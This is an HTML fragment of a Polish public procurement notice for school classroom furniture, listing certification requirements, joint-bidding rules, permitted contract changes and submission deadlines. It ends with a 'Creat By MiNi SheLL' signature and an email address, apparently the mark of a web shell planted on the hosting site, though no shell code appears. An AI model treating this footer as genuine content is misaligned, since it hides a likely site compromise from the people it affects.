Ergonomiczne, wysokość 47–60 cm, polietylen/tkanina min. 30000 cykli, certyfikat PN-EN 12520:2016-02	Certyfikat zgodności z normą PN-EN 12520:2016-02, karta katalogowa<br/>8	Krzesło uczniowskie stacjonarne	Ergonomia zgodna z PN-EN 1729-1:2016, regulacja wysokości i oparcia, trwałe tworzywo, metalowa podstawa, certyfikat zgodności	Certyfikat zgodności z PN-EN 1729-1:2016, karta katalogowa, zdjęcie produktu<br/>9	Wymagania dodatkowe	Gwarancja (24 miesiące w zależności od elementu), aktualizacje oprogramowania, legalny kanał dystrybucji, montaż i przeszkolenie	Dokumenty gwarancyjne producenta, oświadczenie wykonawcy o autoryzowanym kanale dystrybucji, aranżacja graficzna pracowni, zdjęcia mebli<br/>10	Cała pracownia	Nowość sprzętu, stała oferta producenta, wsparcie techniczne w PL, legalne oprogramowanie	Oświadczenie producenta/dystrybutora, dokumenty gwarancyjne, link do strony producenta w PL, aranżacja pracowni <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> brakujące karty katalogowe lub specyfikacje techniczne,<br/>certyfikaty zgodności (np. PN-EN 1729, PN-EN 12520),<br/>deklaracje zgodności CE,<br/>dokumenty potwierdzające okres gwarancji producenta,<br/>dokumenty w języku obcym → wraz z tłumaczeniem na język polski,<br/>dokumenty złożone, ale niekompletne albo zawierające oczywiste błędy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Pełnomocnik: Wykonawcy wspólnie ubiegający się o zamówienie muszą wyznaczyć pełnomocnika do reprezentacji (nie<br/>dotyczy spółki cywilnej, jeśli pełnomocnictwo wynika z umowy spółki).<br/>Pełnomocnictwo: Należy złożyć pełnomocnictwo wraz z ofertą (nie dotyczy spółki cywilnej, jeśli pełnomocnictwo wynika z<br/>umowy spółki).<br/>Podpisanie oferty: Oferta musi być podpisana przez wszystkich wykonawców lub pełnomocnika.<br/>świadczenie o braku podstaw wykluczenia: Każdy wykonawca wspólnie ubiegający się o zamówienie musi złożyć<br/>oświadczenie o braku podstaw wykluczenia.<br/>Korespondencja: Korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.<br/>Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte<br/>wykonanie tego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwości dokonania zmiany postanowień umowy w stosunku do terminu wykonania, z<br/>przyczyny obiektywnych i niezależnych od Wykonawcy, np. w przypadku braku sprzętu na rynku, co Wykonawca musi<br/>uzasadnić oraz adekwatnie do danego przypadku udokumentować.<br/>2. Z uwagi na okoliczności, o których mowa w ust. 1 Strony mogą przedłużyć termin realizacji umowy maksymalnie o 30 dni<br/>w stosunku do terminu wskazanego w § 8 ust. 2 umowy.<br/>3. W przypadku obiektywnego braku możliwości dostarczenia przez Wykonawcę przedmiotu zamówienia wskazanego w<br/>ofercie z powodu braku jego dostępności na rynku, dopuszczalne jest dostarczenie przez Wykonawcę za zgodą<br/>Zamawiającego sprzętu o właściwościach nie gorszych i cenie nie wyższej niż wynikające z oferty. W takim przypadku<br/>Wykonawca obowiązany jest każdorazowo przedłożyć Zamawiającemu stosowne dokumenty <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-08 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma przetargowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com